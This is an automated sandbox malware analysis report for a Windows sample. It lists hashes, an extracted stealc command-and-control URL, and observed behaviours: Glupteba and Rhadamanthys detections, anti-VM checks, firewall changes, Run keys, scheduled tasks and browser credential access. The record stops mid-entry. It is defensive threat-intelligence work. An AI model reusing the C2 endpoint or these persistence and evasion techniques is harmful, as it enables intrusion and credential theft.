Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-03-2024 14:21
Static task
static1
General
-
Target
8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe
-
Size
389KB
-
MD5
56ab49c031367376bc8753b8bc2388da
-
SHA1
16e1bdbeb0df52ce30481c374a45d4ccb98e1219
-
SHA256
8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d
-
SHA512
4bb0e1fb041909ab685cf55017f4fad5981dfade35f181a5e436596941da75d61b4cde788e1d813fb4abee38373a50761d745f4329246c6a9c4a625971d7d8ff
-
SSDEEP
12288:fgkkZ8m4E3qYGJ95Cj5BtcCuPHzVvd/FLobUk:v08zyqtouVLsUk
Malware Config
Extracted
stealc
http://185.172.128.209
-
url_path
/3cd2b41cbde8fc9c.php
Signatures
-
Glupteba payload 15 IoCs
Processes:
resource yara_rule behavioral2/memory/1164-65-0x00000000031D0000-0x0000000003ABB000-memory.dmp family_glupteba behavioral2/memory/1164-81-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral2/memory/4996-100-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral2/memory/4996-101-0x00000000030D0000-0x00000000039BB000-memory.dmp family_glupteba behavioral2/memory/4568-134-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral2/memory/1164-455-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral2/memory/4996-461-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral2/memory/4568-475-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral2/memory/4996-585-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral2/memory/4568-588-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral2/memory/1164-712-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral2/memory/1664-769-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral2/memory/684-770-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral2/memory/1332-772-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral2/memory/1664-982-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
gqaPwdJNBuiwAUU5K6wLgvi5.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" gqaPwdJNBuiwAUU5K6wLgvi5.exe -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
RegAsm.exedescription pid Process procid_target PID 3208 created 2828 3208 RegAsm.exe 49 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
gqaPwdJNBuiwAUU5K6wLgvi5.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ gqaPwdJNBuiwAUU5K6wLgvi5.exe -
Blocklisted process makes network request 4 IoCs
Processes:
u2zg.0.exerundll32.exeflow pid Process 35 1308 u2zg.0.exe 35 1308 u2zg.0.exe 73 1308 u2zg.0.exe 84 2596 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
netsh.exenetsh.exenetsh.exepid Process 1856 netsh.exe 4232 netsh.exe 868 netsh.exe -
Checks BIOS information in registry 2 TTPs 5 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
rundll32.exegqaPwdJNBuiwAUU5K6wLgvi5.exeInstall.exeInstall.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion gqaPwdJNBuiwAUU5K6wLgvi5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion gqaPwdJNBuiwAUU5K6wLgvi5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
gMqqyxU.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\International\Geo\Nation gMqqyxU.exe -
Drops startup file 11 IoCs
Processes:
msbuild.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QzEYoAWx4smjRu1kZKqmayrp.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lmh2KmV2PnvgDuj8Qe9u335v.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t05whX2SIYE8oQqG8v96EfkB.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\78orv5C8hDfSdiFoTzVFxemj.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ea41sbCuHfyirBCvzFZ4JQZW.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3Kzs6FglmbP4kUg9GHssTg5I.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eJ3wYiLxvfbSPc6hk9fHkViy.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AzmgzDQiucq87nB3zKcki3TK.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\05xsiZf5NWRDpjyI705Ae2F6.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\11HR7BA0lP5cYmruMGs6N6F7.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jqBiZZSu8iVMb3snbvzQSdzy.bat msbuild.exe -
Executes dropped EXE 33 IoCs
Processes:
YTL0PmmS83SCp78qfDgfizjt.exefYmZfMjQZC7bcgTgxzU4okLP.exewwBOAPkgANJgdWjG6GOEj92T.exeMQRy5a2TwXi0WZTzeI0qoVpB.exeRW0Wiuz2PCYu43eGZVwdlZGN.exeD5DiMuAoMYdqs3uIyHVh2vxp.exeu2zg.0.exeu2zg.1.exeb04vaIYl7t9GKnLT4gGKsr1W.exeb04vaIYl7t9GKnLT4gGKsr1W.exeb04vaIYl7t9GKnLT4gGKsr1W.exeb04vaIYl7t9GKnLT4gGKsr1W.exeb04vaIYl7t9GKnLT4gGKsr1W.exeoGKQq6EzTV5MSsy1lks4vpiG.exeInstall.exegqaPwdJNBuiwAUU5K6wLgvi5.exeInstall.exefYmZfMjQZC7bcgTgxzU4okLP.exewwBOAPkgANJgdWjG6GOEj92T.exeRW0Wiuz2PCYu43eGZVwdlZGN.exevsQOe04HkxmuVDu5Ca6A8mW2.exeInstall.exeInstall.exeKECFIDGCBF.exeAssistant_108.0.5067.20_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.execsrss.exeinjector.exewindefender.exewindefender.exeYbOhszK.exegMqqyxU.exepid Process 3868 YTL0PmmS83SCp78qfDgfizjt.exe 1164 fYmZfMjQZC7bcgTgxzU4okLP.exe 4996 wwBOAPkgANJgdWjG6GOEj92T.exe 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 4568 RW0Wiuz2PCYu43eGZVwdlZGN.exe 3752 D5DiMuAoMYdqs3uIyHVh2vxp.exe 1308 u2zg.0.exe 3396 u2zg.1.exe 3460 b04vaIYl7t9GKnLT4gGKsr1W.exe 1808 b04vaIYl7t9GKnLT4gGKsr1W.exe 4412 b04vaIYl7t9GKnLT4gGKsr1W.exe 2892 b04vaIYl7t9GKnLT4gGKsr1W.exe 2076 b04vaIYl7t9GKnLT4gGKsr1W.exe 964 oGKQq6EzTV5MSsy1lks4vpiG.exe 916 Install.exe 4744 gqaPwdJNBuiwAUU5K6wLgvi5.exe 3468 Install.exe 1664 fYmZfMjQZC7bcgTgxzU4okLP.exe 684 wwBOAPkgANJgdWjG6GOEj92T.exe 1332 RW0Wiuz2PCYu43eGZVwdlZGN.exe 904 vsQOe04HkxmuVDu5Ca6A8mW2.exe 2432 Install.exe 2544 Install.exe 3848 KECFIDGCBF.exe 3784 Assistant_108.0.5067.20_Setup.exe_sfx.exe 4560 assistant_installer.exe 2720 assistant_installer.exe 480 csrss.exe 1896 injector.exe 3752 windefender.exe 2116 windefender.exe 1644 YbOhszK.exe 4732 gMqqyxU.exe -
Loads dropped DLL 12 IoCs
Processes:
b04vaIYl7t9GKnLT4gGKsr1W.exeb04vaIYl7t9GKnLT4gGKsr1W.exeb04vaIYl7t9GKnLT4gGKsr1W.exeb04vaIYl7t9GKnLT4gGKsr1W.exeb04vaIYl7t9GKnLT4gGKsr1W.exeu2zg.0.exeassistant_installer.exeassistant_installer.exerundll32.exepid Process 3460 b04vaIYl7t9GKnLT4gGKsr1W.exe 1808 b04vaIYl7t9GKnLT4gGKsr1W.exe 4412 b04vaIYl7t9GKnLT4gGKsr1W.exe 2892 b04vaIYl7t9GKnLT4gGKsr1W.exe 2076 b04vaIYl7t9GKnLT4gGKsr1W.exe 1308 u2zg.0.exe 1308 u2zg.0.exe 4560 assistant_installer.exe 4560 assistant_installer.exe 2720 assistant_installer.exe 2720 assistant_installer.exe 2596 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/files/0x0002000000025ce4-512.dat themida behavioral2/memory/4744-530-0x00007FF7E3BC0000-0x00007FF7E4621000-memory.dmp themida behavioral2/memory/4744-532-0x00007FF7E3BC0000-0x00007FF7E4621000-memory.dmp themida behavioral2/memory/4744-533-0x00007FF7E3BC0000-0x00007FF7E4621000-memory.dmp themida behavioral2/memory/4744-535-0x00007FF7E3BC0000-0x00007FF7E4621000-memory.dmp themida behavioral2/memory/4744-534-0x00007FF7E3BC0000-0x00007FF7E4621000-memory.dmp themida behavioral2/memory/4744-536-0x00007FF7E3BC0000-0x00007FF7E4621000-memory.dmp themida behavioral2/memory/4744-537-0x00007FF7E3BC0000-0x00007FF7E4621000-memory.dmp themida -
Processes:
resource yara_rule behavioral2/files/0x0003000000025c35-178.dat upx behavioral2/memory/3396-584-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral2/memory/3396-755-0x0000000000400000-0x0000000000930000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
csrss.exefYmZfMjQZC7bcgTgxzU4okLP.exewwBOAPkgANJgdWjG6GOEj92T.exeRW0Wiuz2PCYu43eGZVwdlZGN.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" fYmZfMjQZC7bcgTgxzU4okLP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" wwBOAPkgANJgdWjG6GOEj92T.exe Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" RW0Wiuz2PCYu43eGZVwdlZGN.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
gqaPwdJNBuiwAUU5K6wLgvi5.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA gqaPwdJNBuiwAUU5K6wLgvi5.exe -
Drops Chrome extension 2 IoCs
Processes:
gMqqyxU.exedescription ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json gMqqyxU.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json gMqqyxU.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
gMqqyxU.exedescription ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini gMqqyxU.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
b04vaIYl7t9GKnLT4gGKsr1W.exeb04vaIYl7t9GKnLT4gGKsr1W.exedescription ioc Process File opened (read-only) \??\D: b04vaIYl7t9GKnLT4gGKsr1W.exe File opened (read-only) \??\F: b04vaIYl7t9GKnLT4gGKsr1W.exe File opened (read-only) \??\D: b04vaIYl7t9GKnLT4gGKsr1W.exe File opened (read-only) \??\F: b04vaIYl7t9GKnLT4gGKsr1W.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 46 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeYbOhszK.exegMqqyxU.exegqaPwdJNBuiwAUU5K6wLgvi5.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol YbOhszK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 gMqqyxU.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI gqaPwdJNBuiwAUU5K6wLgvi5.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA gMqqyxU.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 gMqqyxU.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 gMqqyxU.exe File opened for modification C:\Windows\System32\GroupPolicy gqaPwdJNBuiwAUU5K6wLgvi5.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 gMqqyxU.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol gqaPwdJNBuiwAUU5K6wLgvi5.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA gMqqyxU.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini gqaPwdJNBuiwAUU5K6wLgvi5.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini YbOhszK.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA gMqqyxU.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA gMqqyxU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
gqaPwdJNBuiwAUU5K6wLgvi5.exepid Process 4744 gqaPwdJNBuiwAUU5K6wLgvi5.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exeMQRy5a2TwXi0WZTzeI0qoVpB.exedescription pid Process procid_target PID 4932 set thread context of 576 4932 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 77 PID 3156 set thread context of 3208 3156 MQRy5a2TwXi0WZTzeI0qoVpB.exe 90 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 3 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
fYmZfMjQZC7bcgTgxzU4okLP.exeRW0Wiuz2PCYu43eGZVwdlZGN.exewwBOAPkgANJgdWjG6GOEj92T.exedescription ioc Process File opened (read-only) \??\VBoxMiniRdrDN fYmZfMjQZC7bcgTgxzU4okLP.exe File opened (read-only) \??\VBoxMiniRdrDN RW0Wiuz2PCYu43eGZVwdlZGN.exe File opened (read-only) \??\VBoxMiniRdrDN wwBOAPkgANJgdWjG6GOEj92T.exe -
Drops file in Program Files directory 14 IoCs
Processes:
gMqqyxU.exedescription ioc Process File created C:\Program Files (x86)\mVqQIGUXDOgrC\feITmxR.xml gMqqyxU.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja gMqqyxU.exe File created C:\Program Files (x86)\LCifMpYymZWU2\NANOZXe.xml gMqqyxU.exe File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\lwnFiLS.dll gMqqyxU.exe File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\tnLDIQD.xml gMqqyxU.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi gMqqyxU.exe File created C:\Program Files (x86)\yvWovCiVU\UnqLSRy.xml gMqqyxU.exe File created C:\Program Files (x86)\LCifMpYymZWU2\LjcpulfHaxToA.dll gMqqyxU.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\ASJceUC.dll gMqqyxU.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi gMqqyxU.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak gMqqyxU.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak gMqqyxU.exe File created C:\Program Files (x86)\yvWovCiVU\jplHxo.dll gMqqyxU.exe File created C:\Program Files (x86)\gbPxNkbXHfUn\qQKFSEI.dll gMqqyxU.exe -
Drops file in Windows directory 13 IoCs
Processes:
schtasks.exefYmZfMjQZC7bcgTgxzU4okLP.exewwBOAPkgANJgdWjG6GOEj92T.exeschtasks.execsrss.exeRW0Wiuz2PCYu43eGZVwdlZGN.exeschtasks.exeschtasks.exeschtasks.exedescription ioc Process File created C:\Windows\Tasks\FTXCzbcEvROqagNdd.job schtasks.exe File opened for modification C:\Windows\rss fYmZfMjQZC7bcgTgxzU4okLP.exe File created C:\Windows\rss\csrss.exe wwBOAPkgANJgdWjG6GOEj92T.exe File created C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job schtasks.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\rss\csrss.exe RW0Wiuz2PCYu43eGZVwdlZGN.exe File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job schtasks.exe File created C:\Windows\rss\csrss.exe fYmZfMjQZC7bcgTgxzU4okLP.exe File opened for modification C:\Windows\rss RW0Wiuz2PCYu43eGZVwdlZGN.exe File opened for modification C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job schtasks.exe File created C:\Windows\Tasks\mRaseIvrfxDtBOYKW.job schtasks.exe File opened for modification C:\Windows\rss wwBOAPkgANJgdWjG6GOEj92T.exe File created C:\Windows\windefender.exe csrss.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid Process 1804 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 2388 3156 WerFault.exe 85 3592 3868 WerFault.exe 82 3320 3208 WerFault.exe 90 2780 3208 WerFault.exe 90 1564 3752 WerFault.exe 88 492 1308 WerFault.exe 93 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u2zg.0.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u2zg.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u2zg.0.exe -
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 8 schtasks.exe 3912 schtasks.exe 2900 schtasks.exe 3488 schtasks.exe 2624 schtasks.exe 4888 schtasks.exe 4924 schtasks.exe 1080 schtasks.exe 236 schtasks.exe 5028 schtasks.exe 1120 schtasks.exe 3940 schtasks.exe 4308 schtasks.exe 2112 schtasks.exe 4992 schtasks.exe 3880 schtasks.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
rundll32.exeInstall.exeInstall.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
wwBOAPkgANJgdWjG6GOEj92T.exepowershell.exepowershell.exewindefender.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" wwBOAPkgANJgdWjG6GOEj92T.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local 